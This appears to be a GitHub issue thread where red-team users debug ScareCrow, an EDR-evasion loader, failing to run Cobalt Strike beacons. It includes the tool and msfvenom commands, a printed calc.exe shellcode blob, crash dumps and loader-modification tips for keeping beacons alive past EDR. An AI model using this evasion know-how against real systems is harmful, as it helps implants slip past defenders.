Is this project still working? experiencing issues loading several shellcodes

[sl4cky]

I tested the framework using different shellcodes but I keep getting errors, or nothing happens , have used console output for debug.

./ScareCrow -I beacon.bin -domain www.microsoft.com -console

The shellcode is a stageless cobalt shellcode. I'm getting the following output from console and there is no callback to c2:

[DEBUG] [+] Detected Version: 10.0 [DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll [DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll [DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll [DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll [DEBUG] [+] EDR removed [DEBUG] [] Create a Pointer on stack [DEBUG] [] Loading shellcode into a string [DEBUG] [] Copy Pointer's attributes [DEBUG] [] Overwriten Pointer to point to shellcode String [DEBUG] [*] Overwriting shellcode String with Pointer's attributes

also tried with metasploit calc shellcode: msfvenom -p windows/x64/exec CMD="calc.exe" -f raw -o ok.bin

using the same flags as previous and the following error on console:

[DEBUG] [+] Detected Version: 10.0 [DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll [DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll [DEBUG] [+] Reloading: C:\Windows\System32\advapi32.dll [DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll [DEBUG] [+] EDR removed [DEBUG] [] Create a Pointer on stack [DEBUG] [] Loading shellcode into a string [DEBUG] [] Copy Pointer's attributes [DEBUG] [] Overwriten Pointer to point to shellcode String [DEBUG] [*] Overwriting shellcode String with Pointer's attributes Exception 0xc0000005 0x0 0x1b11ab67000 0xc000138000 PC=0xc000138000

runtime.cgocall(0xf0b60, 0x267ec0) runtime/cgocall.go:158 +0x4a fp=0xc000107e18 sp=0xc000107de0 pc=0x935ea rnmzBzfN.JjYY7ypK(0xc000138000?, {0xc000107eb0?, 0x3?, 0x9c767?}) runtime/syscall_windows.go:557 +0x109 fp=0xc000107e90 sp=0xc000107e18 pc=0xebea9 rnmzBzfN.ES5BzOlzgpnB(0x180050?, 0xc000013170?, 0x5?, 0x5?, 0x0?) runtime/syscall_windows.go:495 +0x3b fp=0xc000107ed8 sp=0xc000107e90 pc=0xebc7b main.main() uSiSpGymJxKf.go:1 +0x2c7 fp=0xc000107f80 sp=0xc000107ed8 pc=0x154c07 runtime.main() runtime/proc.go:250 +0x1fe fp=0xc000107fe0 sp=0xc000107f80 pc=0xc7bbe runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000107fe8 sp=0xc000107fe0 pc=0xef2c1

goroutine 2 [force gc (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000045fb0 sp=0xc000045f90 pc=0xc7f56 runtime.goparkunlock(...) runtime/proc.go:369 runtime.forcegchelper() runtime/proc.go:302 +0xb1 fp=0xc000045fe0 sp=0xc000045fb0 pc=0xc7df1 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000045fe8 sp=0xc000045fe0 pc=0xef2c1 created by runtime.init.6 runtime/proc.go:290 +0x25

goroutine 3 [GC sweep wait]: runtime.gopark(0x1?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000047f90 sp=0xc000047f70 pc=0xc7f56 runtime.goparkunlock(...) runtime/proc.go:369 runtime.bgsweep(0x0?) runtime/mgcsweep.go:297 +0xd7 fp=0xc000047fc8 sp=0xc000047f90 pc=0xb2bd7 runtime.gcenable.func1() runtime/mgc.go:178 +0x26 fp=0xc000047fe0 sp=0xc000047fc8 pc=0xa7926 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000047fe8 sp=0xc000047fe0 pc=0xef2c1 created by runtime.gcenable runtime/mgc.go:178 +0x6b

goroutine 4 [GC scavenge wait]: runtime.gopark(0xc00001c070?, 0x1a8d00?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000057f70 sp=0xc000057f50 pc=0xc7f56 runtime.goparkunlock(...) runtime/proc.go:369 runtime.(*scavengerState).park(0x267800) runtime/mgcscavenge.go:389 +0x53 fp=0xc000057fa0 sp=0xc000057f70 pc=0xb0c13 runtime.bgscavenge(0x0?) runtime/mgcscavenge.go:622 +0x65 fp=0xc000057fc8 sp=0xc000057fa0 pc=0xb1225 runtime.gcenable.func2() runtime/mgc.go:179 +0x26 fp=0xc000057fe0 sp=0xc000057fc8 pc=0xa78c6 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000057fe8 sp=0xc000057fe0 pc=0xef2c1 created by runtime.gcenable runtime/mgc.go:179 +0xaa

goroutine 5 [finalizer wait]: runtime.gopark(0x0?, 0x185b00?, 0x60?, 0x1?, 0x2000000020?) runtime/proc.go:363 +0xd6 fp=0xc000049e28 sp=0xc000049e08 pc=0xc7f56 runtime.goparkunlock(...) runtime/proc.go:369 runtime.runfinq() runtime/mfinal.go:180 +0x10f fp=0xc000049fe0 sp=0xc000049e28 pc=0xa6a2f runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000049fe8 sp=0xc000049fe0 pc=0xef2c1 created by runtime.createfing runtime/mfinal.go:157 +0x45

goroutine 18 [GC worker (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000053f50 sp=0xc000053f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000053fe0 sp=0xc000053f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000053fe8 sp=0xc000053fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 34 [GC worker (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000515f50 sp=0xc000515f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000515fe0 sp=0xc000515f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000515fe8 sp=0xc000515fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 35 [GC worker (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000517f50 sp=0xc000517f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000517fe0 sp=0xc000517f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000517fe8 sp=0xc000517fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 36 [GC worker (idle)]: runtime.gopark(0x0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000511f50 sp=0xc000511f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000511fe0 sp=0xc000511f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000511fe8 sp=0xc000511fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 19 [GC worker (idle)]: runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000055f50 sp=0xc000055f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000055fe0 sp=0xc000055f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000055fe8 sp=0xc000055fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 6 [GC worker (idle)]: runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000059f50 sp=0xc000059f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000059fe0 sp=0xc000059f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000059fe8 sp=0xc000059fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 37 [GC worker (idle)]: runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000513f50 sp=0xc000513f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000513fe0 sp=0xc000513f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000513fe8 sp=0xc000513fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25

goroutine 38 [GC worker (idle)]: runtime.gopark(0x515c5c8762c0?, 0x0?, 0x0?, 0x0?, 0x0?) runtime/proc.go:363 +0xd6 fp=0xc000525f50 sp=0xc000525f30 pc=0xc7f56 runtime.gcBgMarkWorker() runtime/mgc.go:1235 +0xf1 fp=0xc000525fe0 sp=0xc000525f50 pc=0xa9931 runtime.goexit() runtime/zGN5fmyhCw.s:1594 +0x1 fp=0xc000525fe8 sp=0xc000525fe0 pc=0xef2c1 created by runtime.gcBgMarkStartWorkers runtime/mgc.go:1159 +0x25 rax 0xc000138000 rbx 0x267ec0 rcx 0x0 rdi 0xf11aa2f000 rsi 0xc000107e50 rbp 0xc000107e08 rsp 0xf11adffcc8 r8 0x0 r9 0x0 r10 0x0 r11 0x202 r12 0xc000013170 r13 0x0 r14 0xc000042000 r15 0xffffffffffffffff rip 0xc000138000 rflags 0x10297 cs 0x33 fs 0x53 gs 0x2b

[Tylous]

Yes, this project is very much still working. It looks like it's your shellcode, unfortunately, I can't help you as not sure what your shellcode looks like (posting debug outputs don't help me when I don't know what's being loaded) It could be a UDRL in the case of cobalt strike or something else. Based on your output, I suggest you try some of the other loaders built into Scarecrow.

[sl4cky]

Ok will do some research and update on this thanks for a quick response :)

[sl4cky]

Posting the calc shellcode used:

\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00

Maybe it's the null bytes?

[sl4cky]

Tried without null bytes as well still not working, will check it further out and update

[chucksploit]

FYI @sl4cky I was running into this same issue with fresh stageless shellcode for CS. I unloaded my UDRL and made a new payload with ScareCrow and everything was resolved.

[Tylous]

It shoulds like it could be a UDRL issue. Hard to know with out know for sure with out all the details of the C2 and other things going into your payload.

[ptr0x1]

I ended up getting this error too, in my case the "image_size_x64" value was too low and c2lint called it out too. Not sure if this related to more recent changes because the profile used to work but maybe this helps.

I also ran into an issue where the binary output is unreliable. Sometimes it straight exits, other times I can see the beacon come in and then die (sometimes after a few successful sleep cycles). I turned off any custom settings in the profile/UDRL but the issue persisted. I ended up modifying the loader routine so it uses virtualalloc + write (just like the DLL loader) instead of the pointer trickery + virtualprotect. This solved it and it is now consistently triggering and stays alive. Again it used to work so maybe latest CS changes are causing an access violation somewhere?

[chucksploit]

Came back to say that I'm experiencing similar issues to @ptr0x1. With bone stock CS shellcode (4.8 release), I will very rarely get a beacon callback, and if I do it dies shortly after. Same outcome for binary payloads and DLLs, so something must be causing issues with the new CS versions; as my previous comment was from old CS shellcode (< 4.7). I'm going to tinker with this a good bit in the coming days and see if I can find some answers.

[chucksploit]

I was able to implement the fix @ptr0x1 spoke about (using the DLL loader for the Binary template) and everything works fine. @Tylous I didn't submit a PR for it since it's not really a fix, but the code's in my fork here: https://github.com/chucksploit/ScareCrow. I'm still trying to see what the root cause is.

[Tylous]

I am working on a new version (which should be out shortly) that removes the old binary template with 4 new ones. The Binary template no longer works with the latest versions of golang. As a result the new version will provide several universal templates.

[Tylous]

ScareCrow 5.0 is out now, this should take of this, please feel free to re-open this if you experience it still.